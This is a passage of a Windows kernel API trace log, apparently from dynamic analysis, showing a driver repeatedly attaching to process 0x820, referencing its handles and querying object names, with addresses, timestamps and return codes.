ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.100] ObReferenceObjectByHandle (in: Handle=0x11ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00070399090, HandleInformation=0x0) returned 0x0 [0290.100] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.100] PsReleaseProcessExitSynchronization () returned 0x2 [0290.100] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d3 [0290.100] ObQueryNameString (in: Object=0xffffe00070399090, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.100] ObfDereferenceObject (Object=0xffffe00070399090) returned 0x7ffe [0290.100] IoCompleteRequest () returned 0x0 [0290.100] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.100] PsAcquireProcessExitSynchronization () returned 0x0 [0290.100] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.100] ObReferenceObjectByHandle (in: Handle=0x11f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00070399b20, HandleInformation=0x0) returned 0x0 [0290.100] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.100] PsReleaseProcessExitSynchronization () returned 0x2 [0290.100] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d2 [0290.100] ObQueryNameString (in: Object=0xffffe00070399b20, ObjectNameInfo=0xffffe0006a6657c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6657c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.100] ObfDereferenceObject (Object=0xffffe00070399b20) returned 0x7ffe [0290.100] IoCompleteRequest () returned 0x0 [0290.100] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.100] PsAcquireProcessExitSynchronization () returned 0x0 [0290.100] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.101] ObReferenceObjectByHandle (in: Handle=0x1214, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00070399840, HandleInformation=0x0) returned 0x0 [0290.101] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.101] PsReleaseProcessExitSynchronization () returned 0x2 [0290.101] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d1 [0290.101] ObQueryNameString (in: Object=0xffffe00070399840, ObjectNameInfo=0xffffe00069fd27c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069fd27c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.101] ObfDereferenceObject (Object=0xffffe00070399840) returned 0x800e [0290.101] IoCompleteRequest () returned 0x0 [0290.101] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.101] PsAcquireProcessExitSynchronization () returned 0x0 [0290.101] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.101] ObReferenceObjectByHandle (in: Handle=0x121c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000703999b0, HandleInformation=0x0) returned 0x0 [0290.101] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.101] PsReleaseProcessExitSynchronization () returned 0x2 [0290.101] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6d0 [0290.101] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a37c644, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a37c644, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.101] ObfDereferenceObject (Object=0xffffe000703999b0) returned 0x7fff [0290.101] IoCompleteRequest () returned 0x0 [0290.101] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.101] PsAcquireProcessExitSynchronization () returned 0x0 [0290.101] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.101] ObReferenceObjectByHandle (in: Handle=0x1224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a30c710, HandleInformation=0x0) returned 0x0 [0290.101] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.101] PsReleaseProcessExitSynchronization () returned 0x2 [0290.101] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6cf [0290.101] ObQueryNameString (in: Object=0xffffe0006a30c710, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.101] ObfDereferenceObject (Object=0xffffe0006a30c710) returned 0x7ffe [0290.101] IoCompleteRequest () returned 0x0 [0290.101] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.101] PsAcquireProcessExitSynchronization () returned 0x0 [0290.101] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.101] ObReferenceObjectByHandle (in: Handle=0x1240, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006981bbf0, HandleInformation=0x0) returned 0x0 [0290.101] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.102] PsReleaseProcessExitSynchronization () returned 0x2 [0290.102] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ce [0290.102] ObQueryNameString (in: Object=0xffffe0006981bbf0, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.102] ObfDereferenceObject (Object=0xffffe0006981bbf0) returned 0x7ffe [0290.102] IoCompleteRequest () returned 0x0 [0290.102] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.102] PsAcquireProcessExitSynchronization () returned 0x0 [0290.102] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.102] ObReferenceObjectByHandle (in: Handle=0x1308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a35200, HandleInformation=0x0) returned 0x0 [0290.102] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.102] PsReleaseProcessExitSynchronization () returned 0x2 [0290.102] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6cd [0290.102] ObQueryNameString (in: Object=0xffffe00069a35200, ObjectNameInfo=0xffffe0006a7257c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a7257c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.102] ObfDereferenceObject (Object=0xffffe00069a35200) returned 0x800e [0290.102] IoCompleteRequest () returned 0x0 [0290.102] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.102] PsAcquireProcessExitSynchronization () returned 0x0 [0290.102] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.102] ObReferenceObjectByHandle (in: Handle=0x1378, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000698ff7c0, HandleInformation=0x0) returned 0x0 [0290.102] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.102] PsReleaseProcessExitSynchronization () returned 0x2 [0290.102] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6cc [0290.102] ObQueryNameString (in: Object=0xffffe000698ff7c0, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.102] ObfDereferenceObject (Object=0xffffe000698ff7c0) returned 0x7ffe [0290.102] IoCompleteRequest () returned 0x0 [0290.102] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.102] PsAcquireProcessExitSynchronization () returned 0x0 [0290.102] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.102] ObReferenceObjectByHandle (in: Handle=0x137c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a01cad0, HandleInformation=0x0) returned 0x0 [0290.102] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.102] PsReleaseProcessExitSynchronization () returned 0x2 [0290.102] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6cb [0290.102] ObQueryNameString (in: Object=0xffffe0006a01cad0, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.102] ObfDereferenceObject (Object=0xffffe0006a01cad0) returned 0x7ffe [0290.102] IoCompleteRequest () returned 0x0 [0290.102] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.102] PsAcquireProcessExitSynchronization () returned 0x0 [0290.102] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.102] ObReferenceObjectByHandle (in: Handle=0x1394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069210090, HandleInformation=0x0) returned 0x0 [0290.102] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.102] PsReleaseProcessExitSynchronization () returned 0x2 [0290.102] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6ca [0290.102] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.102] ObfDereferenceObject (Object=0xffffe00069210090) returned 0x7fff [0290.102] IoCompleteRequest () returned 0x0 [0290.103] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.103] PsAcquireProcessExitSynchronization () returned 0x0 [0290.103] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.103] ObReferenceObjectByHandle (in: Handle=0x13c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a605c0, HandleInformation=0x0) returned 0x0 [0290.103] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.103] PsReleaseProcessExitSynchronization () returned 0x2 [0290.103] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c9 [0290.103] ObQueryNameString (in: Object=0xffffe00069a605c0, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.103] ObfDereferenceObject (Object=0xffffe00069a605c0) returned 0x800e [0290.103] IoCompleteRequest () returned 0x0 [0290.103] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.103] PsAcquireProcessExitSynchronization () returned 0x0 [0290.103] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.103] ObReferenceObjectByHandle (in: Handle=0x1444, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a61f20, HandleInformation=0x0) returned 0x0 [0290.103] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.103] PsReleaseProcessExitSynchronization () returned 0x2 [0290.103] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c8 [0290.103] ObQueryNameString (in: Object=0xffffe00069a61f20, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.103] ObfDereferenceObject (Object=0xffffe00069a61f20) returned 0x7ffe [0290.103] IoCompleteRequest () returned 0x0 [0290.103] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.103] PsAcquireProcessExitSynchronization () returned 0x0 [0290.103] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.103] ObReferenceObjectByHandle (in: Handle=0x144c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00079be67d0, HandleInformation=0x0) returned 0x0 [0290.103] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.103] PsReleaseProcessExitSynchronization () returned 0x2 [0290.103] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c7 [0290.103] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.103] ObfDereferenceObject (Object=0xffffe00079be67d0) returned 0x7fff [0290.103] IoCompleteRequest () returned 0x0 [0290.103] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.103] PsAcquireProcessExitSynchronization () returned 0x0 [0290.103] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.103] ObReferenceObjectByHandle (in: Handle=0x1464, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069818e60, HandleInformation=0x0) returned 0x0 [0290.103] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.103] PsReleaseProcessExitSynchronization () returned 0x2 [0290.103] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c6 [0290.103] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.103] ObfDereferenceObject (Object=0xffffe00069818e60) returned 0x7fff [0290.103] IoCompleteRequest () returned 0x0 [0290.103] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.103] PsAcquireProcessExitSynchronization () returned 0x0 [0290.103] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.103] ObReferenceObjectByHandle (in: Handle=0x14b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a46090, HandleInformation=0x0) returned 0x0 [0290.104] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.104] PsReleaseProcessExitSynchronization () returned 0x2 [0290.104] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c5 [0290.104] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.104] ObfDereferenceObject (Object=0xffffe00069a46090) returned 0x7fff [0290.104] IoCompleteRequest () returned 0x0 [0290.104] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.104] PsAcquireProcessExitSynchronization () returned 0x0 [0290.104] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.104] ObReferenceObjectByHandle (in: Handle=0x14d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a625d0, HandleInformation=0x0) returned 0x0 [0290.104] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.104] PsReleaseProcessExitSynchronization () returned 0x2 [0290.104] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c4 [0290.104] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.104] ObfDereferenceObject (Object=0xffffe00069a625d0) returned 0x7fff [0290.104] IoCompleteRequest () returned 0x0 [0290.104] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.104] PsAcquireProcessExitSynchronization () returned 0x0 [0290.104] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.104] ObReferenceObjectByHandle (in: Handle=0x151c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a34090, HandleInformation=0x0) returned 0x0 [0290.104] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.104] PsReleaseProcessExitSynchronization () returned 0x2 [0290.104] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c3 [0290.104] ObQueryNameString (in: Object=0xffffe00069a34090, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.104] ObfDereferenceObject (Object=0xffffe00069a34090) returned 0x7ffe [0290.104] IoCompleteRequest () returned 0x0 [0290.104] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.104] PsAcquireProcessExitSynchronization () returned 0x0 [0290.104] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.104] ObReferenceObjectByHandle (in: Handle=0x15a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a35570, HandleInformation=0x0) returned 0x0 [0290.104] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.104] PsReleaseProcessExitSynchronization () returned 0x2 [0290.104] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c2 [0290.104] ObQueryNameString (in: Object=0xffffe00069a35570, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.104] ObfDereferenceObject (Object=0xffffe00069a35570) returned 0x7ffe [0290.104] IoCompleteRequest () returned 0x0 [0290.104] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.104] PsAcquireProcessExitSynchronization () returned 0x0 [0290.104] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.104] ObReferenceObjectByHandle (in: Handle=0x15b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006981f680, HandleInformation=0x0) returned 0x0 [0290.104] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.104] PsReleaseProcessExitSynchronization () returned 0x2 [0290.104] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c1 [0290.104] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0290.104] ObfDereferenceObject (Object=0xffffe0006981f680) returned 0x7fff [0290.104] IoCompleteRequest () returned 0x0 [0290.105] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.105] PsAcquireProcessExitSynchronization () returned 0x0 [0290.105] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.105] ObReferenceObjectByHandle (in: Handle=0x1610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a270dd0, HandleInformation=0x0) returned 0x0 [0290.105] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.105] PsReleaseProcessExitSynchronization () returned 0x2 [0290.105] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6c0 [0290.105] ObQueryNameString (in: Object=0xffffe0006a270dd0, ObjectNameInfo=0xffffe0006a2a5044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2a5044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.105] ObfDereferenceObject (Object=0xffffe0006a270dd0) returned 0x7ffe [0290.105] IoCompleteRequest () returned 0x0 [0290.105] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.105] PsAcquireProcessExitSynchronization () returned 0x0 [0290.105] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.105] ObReferenceObjectByHandle (in: Handle=0x1634, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a5af20, HandleInformation=0x0) returned 0x0 [0290.105] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.105] PsReleaseProcessExitSynchronization () returned 0x2 [0290.105] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6bf [0290.105] ObQueryNameString (in: Object=0xffffe00069a5af20, ObjectNameInfo=0xffffe0006a9be044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a9be044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.105] ObfDereferenceObject (Object=0xffffe00069a5af20) returned 0x7ffe [0290.105] IoCompleteRequest () returned 0x0 [0290.105] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.105] PsAcquireProcessExitSynchronization () returned 0x0 [0290.105] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.105] ObReferenceObjectByHandle (in: Handle=0x163c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00078ff8a50, HandleInformation=0x0) returned 0x0 [0290.105] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.105] PsReleaseProcessExitSynchronization () returned 0x2 [0290.105] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6be [0290.105] ObQueryNameString (in: Object=0xffffe00078ff8a50, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.105] ObfDereferenceObject (Object=0xffffe00078ff8a50) returned 0x7ffe [0290.105] IoCompleteRequest () returned 0x0 [0290.106] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.106] PsAcquireProcessExitSynchronization () returned 0x0 [0290.106] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.106] ObReferenceObjectByHandle (in: Handle=0x1648, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2885f0, HandleInformation=0x0) returned 0x0 [0290.106] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0290.106] PsReleaseProcessExitSynchronization () returned 0x2 [0290.106] ObfDereferenceObject (Object=0xffffe00069ef4840) returned 0x5e6bd [0290.106] ObQueryNameString (in: Object=0xffffe0006a2885f0, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0290.106] ObfDereferenceObject (Object=0xffffe0006a2885f0) returned 0x7ffe [0290.106] IoCompleteRequest () returned 0x0 [0290.106] PsLookupProcessByProcessId (in: ProcessId=0x820, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0290.106] PsAcquireProcessExitSynchronization () returned 0x0 [0290.106] KeStackAttachProcess (in: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00069ef4840, ApcState=0xffffd000ac0cf400) [0290.106] ObReferenceObjectByHandle (in: Handle=0x1668, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a2a8c40, 